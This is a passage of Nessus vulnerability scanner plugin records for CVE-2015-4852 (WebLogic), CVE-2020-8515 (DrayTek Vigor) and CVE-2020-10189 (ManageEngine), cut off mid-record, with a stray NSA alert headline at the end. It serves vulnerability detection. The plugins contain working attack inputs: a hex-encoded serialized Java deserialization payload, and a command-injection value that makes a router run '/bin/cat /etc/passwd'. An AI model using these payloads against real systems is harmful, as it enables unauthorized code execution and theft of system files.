'\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x3b\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x58\\x76\\x90\\x11\\x41\\x02\\xb1\\x94\\x02\\x00\\x01\\x4c\\x00\\x09\\x69\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x78\\x70\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x49\\x6e\\x74\\x65\\x67\\x65\\x72\\x12\\xe2\\xa0\\xa4\\xf7\\x81\\x87\\x38\\x02\\x00\\x01\\x49\\x00\\x05\\x76\\x61\\x6c\\x75\\x65\\x78\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4e\\x75\\x6d\\x62\\x65\\x72\\x86\\xac\\x95\\x1d\\x0b\\x94\\xe0\\x8b\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x01';\nauth_request += '\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x25\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x49\\x6d\\x6d\\x75\\x74\\x61\\x62\\x6c\\x65\\x53\\x65\\x72\\x76\\x69\\x63\\x65\\x43\\x6f\\x6e\\x74\\x65\\x78\\x74\\xdd\\xcb\\xa8\\x70\\x63\\x86\\xf0\\xba\\x0c\\x00\\x00\\x78\\x72\\x00\\x29\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6d\\x69\\x2e\\x70\\x72\\x6f\\x76\\x69\\x64\\x65\\x72\\x2e\\x42\\x61\\x73\\x69\\x63\\x53\\x65\\x72\\x76\\x69\\x63\\x65\\x43\\x6f\\x6e\\x74\\x65\\x78\\x74\\xe4\\x63\\x22\\x36\\xc5\\xd4\\xa7\\x1e\\x0c\\x00\\x00\\x78\\x70\\x77\\x02\\x06\\x00\\x73\\x72\\x00\\x26\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6d\\x69\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x4d\\x65\\x74\\x68\\x6f\\x64\\x44\\x65\\x73\\x63\\x72\\x69\\x70\\x74\\x6f\\x72\\x12\\x48\\x5a\\x82\\x8a\\xf7\\xf6\\x7b\\x0c\\x00\\x00\\x78\\x70\\x77\\x34\\x00\\x2eauthenticate\\x28\\x4c\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x73\\x65\\x63\\x75\\x72\\x69\\x74\\x79\\x2e\\x61\\x63\\x6c\\x2eUserInfo\\x3b\\x29\\x00\\x00\\x00\\x1b\\x78\\x78\\xfe\\x00\\xff';\nsend_t3(sock:sock, data:auth_request);\n\n# read in the response to our bad login request\nreturn_val = recv_t3(sock:sock);\nclose(sock);\n\nif (isnull(return_val) ||\n \"org.apache.commons.collections.functors.ConstantTransformer cannot be cast to\" >!< return_val)\n audit(AUDIT_INST_VER_NOT_VULN, appname, version);\n\nreport =\n '\\nNessus was able to exploit a Java deserialization vulnerability by' +\n '\\nsending a crafted Java object.' +\n '\\n';\nsecurity_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T17:22:59", "description": "The remote Oracle WebLogic server is affected by a remote code execution vulnerability in the WLS Security component due to unsafe deserialize calls of unauthenticated Java objects to the Apache Commons Collections (ACC) library. An unauthenticated, remote attacker can exploit this to execute arbitrary code on the target host.", "cvss3": {"score": 10, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2015-12-04T00:00:00", "type": "nessus", "title": "Oracle WebLogic Server Java Object Deserialization RCE (Local Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-4852"], "modified": "2022-08-03T00:00:00", "cpe": ["cpe:/a:oracle:weblogic_server"], "id": "ORACLE_WEBLOGIC_SERVER_CVE_2015_4852.NBIN", "href": "https://www.tenable.com/plugins/nessus/87209", "sourceData": "Binary data oracle_weblogic_server_cve_2015_4852.nbin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-02T19:08:25", "description": "Nessus was able to exploit an un-authenticated remote command execution vulnerability on the web adminstration UI on the remote router and was able to retrieve the contents of /etc/passwd.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-10-22T00:00:00", "type": "nessus", "title": "DrayTek Vigor < 1.5.1 Unauthenticated RCE (Direct Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-8515"], "modified": "2022-01-21T00:00:00", "cpe": ["x-cpe:/h:draytek:vigor"], "id": "DRAYTEK_VIGOR_UNAUTH_RCE.NASL", "href": "https://www.tenable.com/plugins/nessus/141781", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141781);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/21\");\n\n script_cve_id(\"CVE-2020-8515\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"DrayTek Vigor < 1.5.1 Unauthenticated RCE (Direct Check)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote router is affected by an unauthenticated remote command execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"Nessus was able to exploit an un-authenticated remote command execution vulnerability\non the web adminstration UI on the remote router and was able to retrieve the contents\nof /etc/passwd.\");\n # https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56fb076c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 1.5.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-8515\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/02/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/h:draytek:vigor\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"draytek_vigor_detect.nbin\");\n script_require_keys(\"Host/DrayTek/Vigor\");\n\n exit(0);\n}\n\ninclude('http.inc');\n\nif (!get_kb_item('Host/DrayTek/Vigor')) audit(AUDIT_HOST_NOT, 'DrayTek Vigor');\nmodel = get_kb_item_or_exit('Host/DrayTek/Vigor/model');\n\nif(model !~ \"^[Vv]igor(300[Bb]|2960|3900)\")\n audit(AUDIT_HOST_NOT, 'affected');\n\nport = get_http_port(default:443, embedded:TRUE);\n\nparams = 'action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a';\n\nres = http_send_recv3(\n item : '/cgi-bin/mainfunction.cgi',\n method : 'POST',\n port : port,\n follow_redirect : 1,\n content_type : 'application/x-www-form-urlencoded',\n exit_on_fail : TRUE,\n data : params\n);\n\nif(egrep(string:res[2], pattern:\"root:.*:0:[01]:\"))\n{\n contents = res[2] - strstr(r[2], \"<br />\");\n\n if (isnull(contents)) security_report_v4(port:port, severity:SECURITY_HOLE);\n else\n {\n contents = data_protection::redact_etc_passwd(output:contents);\n report = '\\n';\n report += 'Here are the duplicated contents of the file \"/etc/passwd\" that\\n';\n report += 'Nessus was able to read from the remote host :\\n\\n';\n report += contents;\n \n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n }\n exit(0);\n}\nelse\n{\n audit(AUDIT_HOST_NOT, 'affected');\n}\n\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-12T14:54:00", "description": "The ManageEngine Desktop Central application running on the remote host is version 10 prior to build 100479. It is, therefore, affected by a remote code execution vulnerability.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-03-19T00:00:00", "type": "nessus", "title": "ManageEngine Desktop Central 10 < Build 100479 Remote Code Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-10189"], "modified": "2022-01-24T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central"], "id": "MANAGEENGINE_DESKTOP_CENTRAL_100479.NASL", "href": "https://www.tenable.com/plugins/nessus/134677", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134677);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/24\");\n\n script_cve_id(\"CVE-2020-10189\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"ManageEngine Desktop Central 10 < Build 100479 Remote Code Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a Java-based web application that is\naffected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The ManageEngine Desktop Central application running on the remote\nhost is version 10 prior to build 100479. It is, therefore, affected by\na remote code execution vulnerability.\");\n # https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b517c025\");\n # https://www.manageengine.com/products/desktop-central/rce-vulnerability-cve-2020-10189.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9944baef\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ManageEngine Desktop Central version 10 build 100479 or\nlater. Alternatively, apply the manual, vendor-supplied workaround.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-10189\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribu
NSA Alert: Chinese State-Sponsored Actors Exploit Known Vulnerabilities
